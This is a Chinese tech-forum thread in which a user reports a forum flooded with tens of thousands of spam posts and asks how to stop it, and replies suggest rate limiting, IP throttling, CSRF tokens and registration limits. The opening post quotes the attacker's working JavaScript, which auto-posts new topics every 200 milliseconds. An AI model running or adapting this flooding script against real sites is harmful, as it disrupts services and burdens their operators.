一个帖子被灌水 7 万多页的回复,整个论坛被灌水无数帖... 而且灌水者还发了帖:https://www.94cb.com/t/54367
(function() {
setInterval(function() {
$.post("/new", {
FormHash: "1d65517c",
Title: "iHacker 刷帖-" + parseInt(Math.random() * 1000000000000).toString(16),
Content: "看你怎么删!<img src=\"/static/editor/dialogs/emotion/images/i_f25.png\" /><br/>Google DDOS Attacker.",
Tag: ["Google", "DDOS", "刷帖", "黑客"]
},
function(rq) {
posted(rq.TopicID);
});
},
200);
})();
function posted(id) {
console.log("成功发帖! ID:" + id);
}
1
walpurgis 2020-02-12 20:19:31 +08:00
链接里刷帖的人不是写了解决方法了么
|
2
airyland 2020-02-12 20:20:44 +08:00
人家还给了你解决方法。。
先把该上的上了: 发帖最小间隔限制 /单小时 /单天频率限制,新注册发帖限制,ip 频率限制,重复文字限制。 然后再考虑对垃圾信息 /无意义回复进行识别。 另外,你这个站是国内的,按照网络安全法,你得对用户进行实名认证,至少需要绑定手机。 |
3
ebingtel 2020-02-12 20:27:28 +08:00
nginx 限制 ip 的访问频率 最简单……
|
4
yankebupt 2020-02-12 20:29:26 +08:00 1
2 楼别欺负人了
本来说这黑客也太欺负新手了, 后来看到代码连静态 FormHash 都贴出来了…… 这就是楼主的不对了...... 其实我更加严重怀疑这只是个骗流量的链接......你们觉得是不是 |
5
15955598765 2020-02-12 20:37:53 +08:00
体验了一下,速度真的蛮快的!赞一个!!!
|
6
oott123 2020-02-12 20:51:55 +08:00 via Android
…这是在秀下限
|
7
Valid 2020-02-12 20:56:04 +08:00
请让他来 v2 刷
|
8
ben1024 2020-02-12 20:59:13 +08:00
csrf_token。。。
哈哈哈哈哈 |
9
xd314697475 2020-02-12 21:02:38 +08:00
这个论坛性能确实挺好的
主机什么配置啊? |
10
veike 2020-02-12 21:11:12 +08:00
@xd314697475 每隔 200ms 执行一次
|
11
wfdaj OP 论坛不是我的,程序也不是我写的。只是想看看有没有比较高效的解决办法。😂
|
12
chenqh 2020-02-12 21:20:56 +08:00
我记得这个论坛的作者在 v2 呀
|
13
chenqh 2020-02-12 21:23:52 +08:00 1
不过性能确实好,翻了那么多页,居然不卡,不亏是 tx 大佬
|
14
mxalbert1996 2020-02-13 00:35:03 +08:00 via Android
在墙外根本打不开。。。
|
16
xyjincan 2020-02-13 10:32:45 +08:00
限制注册,封号!
|